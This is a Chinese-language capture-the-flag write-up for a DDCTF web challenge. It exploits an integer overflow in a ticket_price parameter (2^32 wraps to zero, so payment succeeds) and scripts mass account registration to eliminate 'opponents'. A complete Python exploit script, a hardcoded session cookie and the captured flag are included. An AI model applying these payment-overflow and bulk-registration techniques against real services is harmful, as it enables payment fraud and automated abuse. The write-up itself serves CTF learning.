url: http://117.51.147.15:5050/index.html
1.png
首先打开就是一个登陆界面,查看源代码没有什么发现,就先注册一个账户,注册完之后,直接跳转进余额,买门票的页面,这里顺便f12看了一下请求头,有一个cookie,后续会用到,这里先不说。
2.png
3.png
然后我们点击立即购买,细心一点可以看到发送了一个请求,GET /ctf/api/buy_ticket?ticket_price=2000 HTTP/1.1发现添加进了订单列表,点击支付,很明显余额不足。我们返回,回到这个请求,试着改了一下ticket_price的值,修改为100,发现提示门票价格为2000,小的不行,那往上加到123456789却是可以的,那自然想到可能是大数溢出,fuzz了一翻之后发现大概在2^32出溢出为0,修改请求,支付成功。
4.png
发现有两个参数,id和ticket,然后点击移除对手,发现也有需要输入id和ticket,把自己的输入进去提示不能移除自己,换个浏览器注册了后拿id和ticket过来一试,发现对手减了一个,那逻辑就很清楚了,批量注册和移除对手,按照吃鸡的逻辑,把对手都淘汰掉就吃鸡了。并且人数越少越难移除对手,所以跑了挺久。
附上脚本:
#coding:utf-8
import json
import time
import re
import requests
def removeBot(id, ticket):
url = "http://117.51.147.155:5050/ctf/api/remove_robot?id=" + str(id) + "&ticket=" + str(ticket)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"Cookie": "user_name=ivenwings1; REVEL_SESSION=4d9c64ceae23ec51677544513a258841"
}
tmp = requests.get(url=url, headers=headers)
if '200' in tmp.text:
print("remove ID %s success!" % id)
def main():
for i in range(500):
url = "http://117.51.147.155:5050/ctf/api/register?name=Robot-%s&password=12345678" % str(i)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7"
}
tmp = requests.get(url=url, headers=headers)
print(tmp.text)
if '200' in tmp.text:
print("Registed!")
cookie = login(i)
print(cookie)
id, ticket = buyticket(cookie)
print("id:"+str(id)+" ticket:"+str(ticket))
removeBot(id, ticket)
def login(i):
url = "http://117.51.147.155:5050/ctf/api/login?name=Robot-%s&password=12345678" % str(i)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7"
}
tmp = requests.get(url=url, headers=headers)
if '200' in tmp.text:
print("login!")
return {"Cookie":str(tmp.headers['Set-cookie'].replace(" Path=/, ", "").replace("; Path=/", ""))}
def buyticket(cookie):
url = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296"
tmp = requests.get(url, headers=cookie)
# print(tmp.json())
bill_id = tmp.json()['data'][0]['bill_id']
url_bill = "http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id=%s" % bill_id
tmp2 = requests.get(url_bill, headers=cookie)
tmp3 = tmp2.json()['data'][0]
return str(tmp3['your_id']), tmp3['your_ticket']
main()
耐心等待:
5.png
得到flag DDCTF{chiken_dinner_hyMCX[n47Fx)}
考点:
1\. 大数溢出
2\. 批量注册操作
网友评论